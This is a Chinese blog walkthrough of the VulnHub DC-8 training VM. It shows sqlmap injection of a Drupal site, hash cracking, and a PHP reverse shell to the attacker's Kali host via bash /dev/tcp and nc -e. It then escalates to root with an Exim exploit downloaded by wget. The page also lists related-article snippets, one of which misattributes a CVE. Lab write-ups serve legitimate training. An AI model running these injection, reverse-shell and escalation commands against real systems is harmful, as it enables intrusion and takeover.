Vulhub 靶场训练 DC-8解析

最新推荐文章于 2024-04-24 00:19:12 发布
最新推荐文章于 2024-04-24 00:19:12 发布
阅读量1k 收藏 19
点赞数 23
文章标签: 渗透测试 vulnhub web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/136275969
版权

一、环境搭建

kali的IP地址:192.168.200.14

DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接

若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

1707096409_65c0395921b40dc60ff96.png!small?1707096410866

第二种方式:

netdiscover -r 192.168.200.0/24

1707096416_65c039601181f4d8b1c39.png!small?1707096417428

2、开放端口探测

nmap -sV -p-  192.168.200.13

1707096425_65c039690ea669f78bb6c.png!small?1707096426517

开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

1707096435_65c039730c337d1afd246.png!small?1707096435976

1707096440_65c03978b5445e89cc547.png!small?1707096441695

1707096446_65c0397e8e10780b3a8ed.png!small?1707096447687

查看robots。txt文件

1707096453_65c03985d5c12d553a15e.png!small?1707096454863

这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面

1707096463_65c0398f22eef008ab219.png!small?1707096464271

和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的

不过页面中存在这样的三个不同的URL:

http://192.168.200.13/?nid=1

http://192.168.200.13/?nid=2

http://192.168.200.13/?nid=3

可能存在文件包含和SQL注入的漏洞

1707096470_65c039962f0f115be5ec5.png!small?1707096471645

SQLMAP

1、扫描数据库

sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

1707096477_65c0399d72bfdc0d23575.png!small?1707096478950

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

1707096485_65c039a5d4af8cf95cfed.png!small?1707096487029

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

1707096514_65c039c21d342f8fe79b0.png!small?1707096515383

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

1707096522_65c039ca6b2365f349616.png!small?1707096523660

账号:admin

密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john

密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

1707096531_65c039d3bb66f35725e7e.png!small?1707096532801

1707096536_65c039d81cbd1402d3f97.png!small?1707096537157

爆破出来密文:turtle

试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了

1707096543_65c039df78274a11f26ce.png!small?1707096544679

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码

1707096551_65c039e79bfdde944fbc5.png!small?1707096552648

登录成功!

1707096560_65c039f011ecd7e3c15ad.png!small?1707096561194

还是运用上一靶场的方法,找一找能上传一句话木马的php文件

连不上。然后显示phpinfo的地址死活没反应

直接获取shell

PHP反弹 shell(Post 请求发送命令)

<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?>

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码

1707096569_65c039f9a28c02c881412.png!small?1707096570796

1707096577_65c03a01c32a87b84ba20.png!small?1707096578738

成功反弹shell

1707096584_65c03a08b316ebe7af53b.png!small?1707096585882

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

1707096593_65c03a11292240a711ffe.png!small?1707096594204

查询Exim 版本为4.89

1707096599_65c03a17d0a1b56852b03.png!small?1707096601070

利用kali搜索EXP

1707096607_65c03a1f33af4c2c75f53.png!small?1707096608721

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

1707096618_65c03a2ab235c83dad241.png!small?1707096619975

文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

1707096624_65c03a3099b52fea1d07b.png!small?1707096625612

赋予可执行权限

1707096631_65c03a37429f8a5dd4cb6.png!small?1707096632431

接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限

1707096639_65c03a3f0fd4448180713.png!small?1707096640196

查看脚本的使用规则,又两个参数可用

1707096646_65c03a46a9b6db15e4945.png!small?1707096647939

将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功

1707096655_65c03a4f05f984e4d9eac.png!small?1707096656246

近到root目录,查看最终flag内容

1707096662_65c03a56e5e5373c325fd.png!small?1707096664524

黑战士安全
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1379
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
vulnhub靶场DC-8
qq_58091216的博客
01-14 1027
我们查看node,我们可以看到3行蓝色的字,我们一个一个进行访问,最后发现这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞。将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码。我们可以看到name和pass,我们想到前面的登录页面,我们进行爆破即可。我们可以看到报错了,可能存在报错注入,我们使用sqlmap进行测试。我们看到2个用户名和密码,但是密码是加密的,我们进行解密。
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2100
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-8靶场
mlws1900的博客
03-28 549
下载不了可以用迅雷下载。
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4672
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
靶场练习第十六天~vulnhub靶场dc-8
qq_57976347的博客
02-15 358
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
DC-8靶场实战
qq_42754807的博客
03-21 731
DC-9靶场实战
基于vulnhub靶场DC8的通关流程 (个人记录)
qq_57774303的博客
12-29 422
用常用的工具nmap扫描192.168.52.142,观察其开放的端口号。我们发现这里可以发现能够上传文本,我们可以使用脚本来反射webshell。明明操作的都没问题,不知道跑为什么一直连接不上,所以我们换一种用法。发现问好后面的数字会随着点击东西的不同而进行变化。扫描出来的账户名是admin 密码是经过加密的。我们现在用MSF去链接paylopad的链接。扫出来的东西,你瞧见每,发现有user的表。可以尝试我们用之前得到的密码和账号进行登陆。我们用sqlmap扫描扫出来的数据库。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-8靶机渗透
m0_62008601的博客
06-05 1022
dc-8靶机详细渗透过程
DC-8靶机渗透测试
读书 买花 长大
05-12 468
DC-8
DC8靶机渗透测试(个人学习记录)
m0_53806046的博客
03-24 1065
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值